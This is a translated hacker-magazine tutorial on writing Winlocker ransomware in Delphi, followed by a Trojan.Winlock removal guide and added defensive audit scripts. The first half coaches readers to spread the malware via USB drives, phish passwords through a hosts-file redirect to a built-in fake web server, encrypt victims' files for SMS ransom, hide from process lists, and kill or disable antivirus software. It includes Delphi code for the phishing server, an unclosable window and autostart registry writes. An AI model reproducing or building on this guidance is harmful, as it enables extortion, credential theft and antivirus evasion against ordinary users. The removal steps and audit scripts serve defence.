Tip #1: the more the merrier

Infected a poor user's computer? Don't forget about his friends! Remember, the wider the virus spreads, the greater the chance of getting money. Having settled on the enemy machine, you should not waste time but look for a new beachhead. How? One of the simplest and most effective ways is to monitor and infect flash drives. Since users constantly use flash drives, it is easy for our virus to migrate from one system to another. Detecting that a flash drive has been connected is easy: it is enough to handle the WM_DEVICECHANGE message.

In the code in the third box I used constants and structures that are not declared in the units that ship with Delphi; you will have to declare them yourself. I took all the information from MSDN, but you need not bother with that and can simply take the source of my code from the DVD.

Tip #2: your passwords will be ours!

What web services does a modern user use? You don't need to be a rocket scientist to name a few: mail, Odnoklassniki, VKontakte, Facebook, Twitter and so on; the list goes on. What am I getting at? Being on enemy territory, it would be nice to collect all the passwords. They may come in handy later. Besides, with such trump cards in hand it becomes possible to put pressure on the victim: having obtained passwords for various accounts, the author of the virus can use them to change the contact details and set his own passwords. The real user ends up in a very bad position; simply put, he loses his account. That is much more serious than a blocked desktop, and so the chances of payment for your "services" increase.

The question is how to do this most easily. Users typically let the browser store their passwords, so the obvious idea is to steal the browser's password store; an example of such theft was shown in the article "Evil Computer". I will show an alternative: modifying the hosts file. That file maps host names to IP addresses and is consulted before DNS, so a program that can write to it (which takes administrator rights) can add entries for popular web services and send the user wherever it likes. Where to? One could set up a malicious website hosting copies of the popular services' login pages. That is easy to implement, but if users are infected en masse such sites will not survive long. So instead we go a slightly unusual way and build a small web server into the virus; the redirection target then becomes localhost.

For example: 127.0.0.1 www.odnoclassniki.ru

We will not go over editing the hosts file; it is better to look straight away at how to set up a web server in Delphi. If you are a regular reader of our magazine, you should know the Winsock API well: at one time the Coding section carried articles on writing all kinds of clients (FTP, proxy, IRC and so on) using nothing but API functions. I recommend pulling out the back issues and studying the fundamentals thoroughly.

Now, instead of Odnoklassniki.ru, the victim lands not on the real site of the popular social network but straight in the clutches of our evil server. The web server must of course be polite and show the real-looking Odnoklassniki page (read: a phishing page, prepared in advance). Then everything is simple: the user enters his login details and the web server saves them. To avoid being caught out immediately, it is advisable to redirect afterwards to a page saying that the site is currently closed for maintenance, or alternatively to save the data and forward it to the real Odnoklassniki. One caveat the scheme does not address: a redirect of this kind can answer only plain http:// requests, because the local server holds no certificate for the hijacked name, so an https:// bookmark produces a certificate warning instead of the fake page.
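The check a responder would run on a suspect machine's hosts file, as an added example that is not part of the original article or of any tool it mentions: it parses the file (on Windows, %SystemRoot%\System32\drivers\etc\hosts) and reports watched service names mapped to loopback, which is exactly what the redirect above produces, or pinned to any other fixed address. The watch list, the sample file and the documentation address 198.51.100.7 are constructed for illustration.

```python
"""Audit a hosts file for the redirection trick described above: names of
well-known services pointed at loopback (where a local fake server answers)
or pinned to some other fixed address.  Added example, not code from the
original article; WATCHED_NAMES and SAMPLE_HOSTS are constructed."""
import ipaddress
from typing import List, Tuple

# Second-level names a locker of this kind might hijack (constructed list).
WATCHED_NAMES = {"odnoklassniki.ru", "vk.com", "facebook.com", "twitter.com", "mail.ru"}


def parse_hosts(text: str) -> List[Tuple[int, str, List[str]]]:
    """Return (line number, address, [names]) for each mapping line,
    dropping comments and blank lines."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()
        if len(fields) >= 2:
            entries.append((lineno, fields[0], fields[1:]))
    return entries


def registrable_name(host: str) -> str:
    """Crude parent-domain rule (last two labels) so www.vk.com matches vk.com.
    Good enough for this watch list; not a public-suffix implementation."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def audit_hosts(text: str, watched=WATCHED_NAMES) -> List[str]:
    """Human-readable findings for every watched name the file overrides."""
    findings: List[str] = []
    for lineno, address, names in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(address)
        except ValueError:
            findings.append(f"line {lineno}: unparsable address {address!r}")
            continue
        for name in names:
            if registrable_name(name) not in watched:
                continue
            if addr.is_loopback:
                findings.append(f"line {lineno}: {name} -> {address} "
                                "(loopback: a local fake server would answer for this name)")
            else:
                findings.append(f"line {lineno}: {name} -> {address} "
                                "(pinned to a fixed address; compare with DNS before trusting it)")
    return findings


# Constructed sample; 198.51.100.7 is a documentation address, not a real host.
SAMPLE_HOSTS = """\
# constructed sample, not a real capture
127.0.0.1       localhost
::1             localhost
127.0.0.1       www.odnoklassniki.ru odnoklassniki.ru
127.0.0.1       vk.com
0.0.0.0         ads.example.net   # ad-block style entry, not on the watch list
198.51.100.7    mail.ru
"""

if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS):
        print(finding)
```

Ordinary ad-blocking entries (unwatched names sent to 0.0.0.0 or loopback) are left alone on purpose; the signal is a watched service name that the file overrides at all, since a clean hosts file never mentions them.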

Trick #3: ecstasy for the user

How do evil programmers get users to part with their hard-earned money via premium SMS? In various ways; for example, by encrypting files that are valuable to the victim. Which files deserve attention? Best of all, those the victim's work or studies depend on: documents (doc, xls, mdb, ppt, txt), images (jpeg, png, bmp), source code (php, pas, c, h, cpp, dpr, py and so on). If the victim has been writing a thesis or an extremely important report due tomorrow, the attacker has every chance of being paid.

Now about the technical implementation. Files are found with the FindFirst() and FindNext() functions from the SysUtils unit. They are easy to work with, but such fast food is bad for the figure: pulling in SysUtils bloats the executable. Since we do not want to put on weight, we use the more dietary FindFirstFile() and FindNextFile() from the Windows API. They are a little harder to use (see the example of searching for files on a disk), but beauty requires sacrifice.

Encrypting files in Delphi is also simple; it all depends on the chosen method. You can just use ready-made units, of which there are a dime a dozen on torry.net and similar sites. For example, I came across a decent one from a Delphi developer. The unit implements the following functions (note that if, as the name suggests, the TWordTriple key is three 16-bit Words, the key is only 48 bits, which is within brute-force reach of a recovery tool):

//File encryption
function FileEncrypt(InFile, OutFile: String; Key: TWordTriple): boolean;
//File decryption
function FileDecrypt(InFile, OutFile: String; Key: TWordTriple): boolean;
//Text encryption
function TextEncrypt(const s: string; Key: TWordTriple): string;
//Text decryption
function TextDecrypt(const s: string; Key: TWordTriple): string;
//Encryption of a memory block
function MemoryEncrypt(Src: Pointer; SrcSize: Cardinal; Target: Pointer; TargetSize: Cardinal; Key: TWordTriple): boolean;
//Decryption of a memory block
function MemoryDecrypt(Src: Pointer; SrcSize: Cardinal; Target: Pointer; TargetSize: Cardinal; Key: TWordTriple): boolean;

The full text of these functions, as well as examples of their use, can be found on our disk.

Tip #4: multiply!

Tip #5: Play hide and seek to the maximum

As practice shows, the authors of Winlockers do not care much about protecting their creations. For most representatives of this family that I have come across, the protection boiled down to giving the file an inconspicuous name: system.exe, user32.exe, csrss.exe, eplorer.exe and the like. I did not think such methods were still in use, but it turns out I was wrong.
I recommend that you do not neglect protection and consider several approaches:

  1. Give the virus file an inconspicuous name. A primitive rule, but one worth following.
  2. Hide the virus from the process list. This is done by hooking API functions; we have written about API hooking many times, so be sure to re-read those articles.
  3. Use several autostart methods at once.

Trick #6: kill at the start

Do not be lazy: write a routine that forcibly terminates processes. It will help protect your brainchild from the evil antiviruses the user will try to run. Ideally, hook the functions used to launch programs so that they stop working normally.

Work complete

Writing a WinLocker and making a few hundred dollars on it is more than possible. Users still give no thought to security and, when the situation gets tight, are ready to send the coveted SMS rather than use their heads. I have shown you the most primitive skeleton of a Winlocker; bringing it to combat readiness is a matter of a few hours. But should you? The choice is yours. The main thing to remember is that writing and distributing viruses is a criminal offence that carries a real prison sentence. I will not, of course, give you the source code of the complete virus. Not out of greed: these viruses are already a nuisance to everyone, and I certainly do not want there to be more of them after this article. Nor do I want to read news about law enforcement detaining yet another creator of a terrible virus :).

Homemade web server

var
  _buff: array[0..1024] of AnsiChar;  // 1024 bytes of request plus room for a terminating #0
  _request: string;
  _path: string;
  _FileStream: TFileStream;
  _received: Integer;
begin
  FillChar(_buff, SizeOf(_buff), 0);
  _received := recv(_client, _buff, SizeOf(_buff) - 1, 0);
  if _received <= 0 then Exit;  // peer closed the connection or the socket failed
  _request := string(PAnsiChar(@_buff[0]));
  // only the request line ("GET /path HTTP/1.0") is used; the headers are ignored
  _path := GetFilePath(Copy(_request, 1, Pos(#13, _request)));
  _path := ReplaceSlash(_path);
  if (_path = '') or (_path = '\') then
    _path := DocumentRoot + '\' + DirectoryIndex;
  { the original carried a second "if _path = '\'" branch here, commented out;
    the test above already covers it }
  // nothing strips ".." from _path, so any file the process can read is served
  if FileExists(_path) then
  begin
    _FileStream := TFileStream.Create(_path, fmOpenRead or fmShareDenyWrite);
    try
      SendStr(_client, 'HTTP/1.0 200 OK');
      SendStr(_client, 'Server: xSrV');
      SendStr(_client, 'Content-Length: ' + IntToStr(_FileStream.Size));
      SendStr(_client, 'Content-Type: ' + GetTypeContent(_path));
      SendStr(_client, 'Connection: close');
      SendStr(_client, '');
      SendFile(_client, _FileStream);
    finally
      _FileStream.Free;
    end;
  end;
  // Cut out: the rest of the procedure and the helpers GetFilePath, ReplaceSlash,
  // SendStr, SendFile and GetTypeContent, which are not shown on this page

Limiting the launch of applications

Using the registry, one can define the list of programs allowed to run; once the list is set, the user cannot start applications that are not on it. The list lives in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun: create one REG_SZ value per allowed program (named 1, 2, 3 and so on, with the executable's file name as data), then go up one level and add a RestrictRun value of type REG_DWORD set to 1. Two caveats: the restriction applies only to the current user, and only to programs started through the Explorer shell, so anything launched from a command prompt or by another process is unaffected.

Computer management

A user with access to the Computer Management snap-in can do a lot of damage (start services, manage disks and so on). The snap-in cannot be disabled outright through the registry, but removing the Manage entry from the context menu of the My Computer shortcut is a piece of cake: create a NoManageMyComputerVerb value of type REG_DWORD with data 1 under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer. That removes only the menu entry; compmgmt.msc can still be run directly.

We turn off services

Using the registry, it is also easy to disable services the user does not need (antiviruses, for example). The full list of installed services is under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services, one subkey per service. To deactivate a service, edit its Start value: 2 means Automatic, 3 means Manual and 4 means Disabled, so setting Start to 3 changes the service's Startup type to Manual. If you want your software to survive longer on the enemy system, maintain a database of antivirus service names in your creation, identify them precisely and change their startup type. Writing under HKEY_LOCAL_MACHINE requires administrative rights, and the change takes effect only once the service is stopped or the machine rebooted.

What else do we need?

We have looked at the typical functions of any Winlocker; now let us think about how to improve our brainchild. Frankly, I do not understand why professional virus writers do not build in extra useful features. There is no guarantee that the user will reach for his mobile phone and send the coveted SMS to a short number, enriching the author. But there is always a chance to take useful information off the machine: passwords to various services, documents, recorded Skype conversations and so on. We will not limit ourselves and will upgrade our software to the full. Below I describe six features worth implementing in such a "project".

Monitoring flash drives

var
  disk: DWORD;
begin
  // the DBT_* constants and DEV_BROADCAST_* records are not in the standard
  // Delphi units; they must be declared from the MSDN definitions
  case Msg.WParam of
    DBT_DEVICEARRIVAL:   // a device was connected
      if PDEV_BROADCAST_HDR(Msg.LParam)^.dbch_devicetype = DBT_DEVTYP_VOLUME then
      begin
        // bit 0 = A:, bit 1 = B:, bit 2 = C: ...; more than one bit is set
        // when the device brings several volumes
        disk := PDEV_BROADCAST_VOLUME(Msg.LParam)^.dbcv_unitmask;
        // the routine that reacts to the new drive goes here (not shown)
      end;
    DBT_DEVICEREMOVECOMPLETE:   // a device was removed
      if PDEV_BROADCAST_HDR(Msg.LParam)^.dbch_devicetype = DBT_DEVTYP_VOLUME then
      begin
        // the flash drive is gone
      end;
  end;
end;

A window that cannot be closed, using the Windows API

var
  wc: TWndClassEx;
  MainWnd: HWND;
  Mesg: TMsg;
  leftPos, topPos, windowWidth, windowHeight: Integer;
begin
  wc.cbSize := SizeOf(wc);
  wc.style := CS_HREDRAW or CS_VREDRAW;
  wc.lpfnWndProc := @WindowProc;   // WindowProc (not shown) is where closing is refused
  wc.cbClsExtra := 0;
  wc.cbWndExtra := 0;
  wc.hInstance := HInstance;
  wc.hIcon := LoadIcon(0, IDI_APPLICATION);
  wc.hCursor := LoadCursor(0, IDC_ARROW);
  wc.hbrBackground := HBRUSH(COLOR_BTNFACE + 1);
  wc.lpszMenuName := nil;
  wc.lpszClassName := 'win_main';
  if RegisterClassEx(wc) = 0 then Exit;
  leftPos := 20;   // as in the original; 0 would cover the screen completely
  topPos := 0;
  // screen size through the API instead of Screen.Width from the Forms unit
  windowWidth := GetSystemMetrics(SM_CXSCREEN);
  windowHeight := GetSystemMetrics(SM_CYSCREEN);
  MainWnd := CreateWindowEx(0, 'win_main', 'test', WS_OVERLAPPEDWINDOW,
    leftPos, topPos, windowWidth, windowHeight, 0, 0, HInstance, nil);
  // owned by the desktop and always on top: the window stays above everything else
  SetWindowLong(MainWnd, GWL_HWNDPARENT, GetDesktopWindow);
  SetWindowPos(MainWnd, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOMOVE or SWP_NOSIZE);
  ShowWindow(MainWnd, SW_SHOW);
  while GetMessage(Mesg, 0, 0, 0) do
  begin
    TranslateMessage(Mesg);
    DispatchMessage(Mesg);
  end;
end;

WINAPI for working with the registry

var
  Key: HKEY;
begin
  // Substitute one of the autostart key paths for the empty string
  // (left blank in the original); writing under HKLM needs administrator rights.
  if RegOpenKey(HKEY_LOCAL_MACHINE, PChar(''), Key) = ERROR_SUCCESS then
  begin
    // value name and data are both the full path of the running executable;
    // the size is in bytes, so it is scaled by SizeOf(Char) for Unicode Delphi
    RegSetValueEx(Key, PChar(ParamStr(0)), 0, REG_SZ,
      PChar(ParamStr(0)), (lstrlen(PChar(ParamStr(0))) + 1) * SizeOf(Char));
    RegCloseKey(Key);
  end;
end;

“Oh, that’s exactly what the picture was like! Even the number is the same,” the next “victim” almost joyfully “recognized” the virus.

Those of you who repair computers: have you ever noticed that sometimes, when you show up, a broken computer suddenly starts working as if nothing had happened? And someone involuntarily looks at you with fear and respect, or even jokes about it.

In this case, after Windows loaded there was no virus, but I had been called two days earlier and the computer had been switched off all that time. Where did it go?

One of the tips for removing Trojan.Winlock variants suggests setting the system clock in the BIOS two days ahead, and if that does not work, a month, a year... This does not always work, just as wrought-iron bars on the windows do not always save you from burglars but do inspire confidence (I have never managed to get rid of a ransomware this way), but here it seems to have happened by itself.

Still, new dirty tricks are best removed with effective, proven methods. It must be said that the unlocking services currently available on antivirus companies' websites do not always help, and the numerous options for removing these cunningly smart viruses can only confuse.

Meanwhile, among the numerous tips there are two fairly simple but effective ways of getting rid of Trojan.Winlock, the viruses that block the operating system, make work impossible and at the same time demand that you send a certain sum of money.

I will say right away that the methods are not mine; I merely armed myself with them, so let us thank worldwar87 for their usefulness and professional soundness.

Reinstalling Windows is the last resort, because the problem can be solved without wasting time and without much risk to your data.

The first thing to do is to restart the computer, press F8 (on some machines F5) during the initial boot, and select Safe Mode with Command Prompt.

Press Enter and assess the situation: either (1) Safe Mode has booted cleanly without the virus, or (2) the virus has not gone anywhere.

In the first case, type regedit at the command prompt.

Open the registry branch using the path:

HKEY_LOCAL_MACHINE -> SOFTWARE -> Microsoft -> Windows NT -> CurrentVersion -> Winlogon

Look at the Shell value, as in the picture:

On a clean computer you will see what should be there: explorer.exe. On an infected one, the value contains the full path to the virus executable. Remember or write it down; the file is to be deleted next. Check the neighbouring Userinit value the same way: it should contain only the path to userinit.exe (C:\Windows\system32\userinit.exe, followed by a comma).

To do that, type explorer.exe at the command prompt, navigate through My Computer to the virus file and delete it.

In Shell, leave only the entry explorer.exe.

In the second situation, when the virus prevents you from working even in Safe Mode, you will need a bootable Windows Live CD.

You will have to (if not) download it from the Internet. I think you can find it - Google will help you.

Then, in the Live CD's registry editor, select HKEY_LOCAL_MACHINE, choose File -> Load Hive, open C:\WINDOWS\System32\config\software (the SOFTWARE hive of the infected installation) and give it a name; in the key created this way, repeat the steps described in the first case.

After removing the virus entry, select that key and choose File -> Unload Hive; the cleaned hive is written back to C:\WINDOWS\System32\config\software.
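Whichever way the hive was reached (live in Safe Mode, or loaded from the Live CD), the keys this page touches can be checked mechanically from a regedit export. The script below is an added example, not part of the original article or of any tool it mentions: it parses .reg text and reports a Winlogon Shell or Userinit value that is not the default, entries under the Run keys, the Explorer lockdown policies described earlier (NoViewOnDrive decoded from its bitmask into drive letters, RestrictRun with its allow-list, NoManageMyComputerVerb) and the Start type of any service you name. The sample export, the path locker.exe and the service name ExampleAV are constructed, and the expected Userinit path assumes a C: system drive.

```python
"""Triage a regedit export for the Winlocker artifacts discussed on this page:
Winlogon Shell/Userinit, Run-key autostarts, the Explorer lockdown policies
(NoViewOnDrive, RestrictRun, NoManageMyComputerVerb) and the Start type of
named services.  Added example, not code from the original article.  SAMPLE_REG
and the service name ExampleAV are constructed; EXPECTED_USERINIT assumes C:."""
import re
from typing import Dict, Iterable, List, Tuple

# Explorer policy values named on this page and their effect when non-zero.
POLICY_VALUES = {
    "RestrictRun": "Explorer starts only the programs listed under the RestrictRun subkey",
    "NoManageMyComputerVerb": "removes Manage from the My Computer context menu",
}
START_TYPES = {0: "Boot", 1: "System", 2: "Automatic", 3: "Manual", 4: "Disabled"}
EXPECTED_USERINIT = r"c:\windows\system32\userinit.exe"
SERVICE_KEY = re.compile(r"\\(?:currentcontrolset|controlset\d+)\\services\\([^\\]+)$", re.I)
UNESCAPE = re.compile(r"\\(.)")  # .reg escapes backslash and double quote with a backslash


def drive_letters_from_mask(mask: int) -> List[str]:
    """Bit 0 = A:, bit 1 = B:, bit 2 = C: ... the NoViewOnDrive layout (also what
    dbcv_unitmask carries in the WM_DEVICECHANGE code on this page)."""
    return [chr(ord("A") + bit) for bit in range(26) if mask & (1 << bit)]


def parse_reg(text: str) -> Dict[str, Dict[str, Tuple[str, str]]]:
    """{key_path: {value_name: (type, data)}}; REG_SZ unescaped, REG_DWORD as decimal text."""
    keys: Dict[str, Dict[str, Tuple[str, str]]] = {}
    current = None
    text = re.sub(r"\\\r?\n\s*", "", text)  # join hex continuation lines
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith((";", "Windows Registry Editor", "REGEDIT4")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = re.match(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$', line)
        if m is None or current is None:
            continue
        name = "@" if m.group(1) == "@" else UNESCAPE.sub(r"\1", m.group(1)[1:-1])
        data = m.group(2)
        if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
            keys[current][name] = ("REG_SZ", UNESCAPE.sub(r"\1", data[1:-1]))
        elif data.lower().startswith("dword:"):
            keys[current][name] = ("REG_DWORD", str(int(data[6:], 16)))
        else:
            keys[current][name] = ("OTHER", data)
    return keys


def triage(reg_text: str, watched_services: Iterable[str] = ()) -> List[str]:
    """Human-readable findings; an empty list means nothing on the checklist was seen."""
    findings: List[str] = []
    watched = {s.lower() for s in watched_services}
    for key, values in parse_reg(reg_text).items():
        k = key.lower()
        if k.endswith(r"\windows nt\currentversion\winlogon"):
            shell = values.get("Shell", ("REG_SZ", "explorer.exe"))[1]
            if shell.strip().lower() != "explorer.exe":
                findings.append(f"{key}: Shell is '{shell}' (expected explorer.exe)")
            userinit = values.get("Userinit", ("REG_SZ", EXPECTED_USERINIT))[1]
            if userinit.strip().rstrip(",").lower() != EXPECTED_USERINIT:
                findings.append(f"{key}: Userinit is '{userinit}' (expected {EXPECTED_USERINIT},)")
        elif k.endswith(r"\policies\explorer"):
            for name, (_, data) in values.items():
                if name == "NoViewOnDrive" and data.isdigit():
                    letters = ",".join(drive_letters_from_mask(int(data)))
                    findings.append(f"{key}: NoViewOnDrive={data} blocks drives {letters}")
                elif name in POLICY_VALUES and data not in ("0", ""):
                    findings.append(f"{key}: {name}={data} ({POLICY_VALUES[name]})")
        elif k.endswith(r"\policies\explorer\restrictrun"):
            allowed = ", ".join(d for n, (_, d) in values.items() if n != "@")
            findings.append(f"{key}: only these programs may be started from Explorer: {allowed}")
        elif k.endswith(r"\currentversion\run"):
            for name, (_, data) in values.items():
                findings.append(f"{key}: autorun '{name}' -> {data}")
        else:
            m = SERVICE_KEY.search(key)
            if m and m.group(1).lower() in watched and "Start" in values:
                start = int(values["Start"][1])
                findings.append(f"service {m.group(1)}: Start={start} ({START_TYPES.get(start, '?')})")
    return findings


# Constructed sample export modelled on what this page describes; not a real case.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe,C:\\Documents and Settings\\user\\locker.exe"
"Userinit"="C:\\Windows\\system32\\userinit.exe,"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoViewOnDrive"=dword:0000000c
"RestrictRun"=dword:00000001
"NoManageMyComputerVerb"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun]
"1"="locker.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"locker"="C:\\Documents and Settings\\user\\locker.exe"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ExampleAV]
"Start"=dword:00000003
"""
```

Key paths are matched by suffix, so a hive loaded from the Live CD under a name of your choosing (HKEY_LOCAL_MACHINE\<name>\Microsoft\Windows NT\CurrentVersion\Winlogon) is found as readily as the live key. regedit writes its exports as UTF-16; read them with open(path, encoding="utf-16") and pass the text to triage(), naming the antivirus services you expect to find running. The bitmask decoder uses the same bit-per-letter layout (bit 0 = A:) that the WM_DEVICECHANGE code above reads from dbcv_unitmask.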

After this, restart the computer. The virus has been removed, but run a full scan with an antivirus with up-to-date databases as a final check on the work done.

Happy hunting!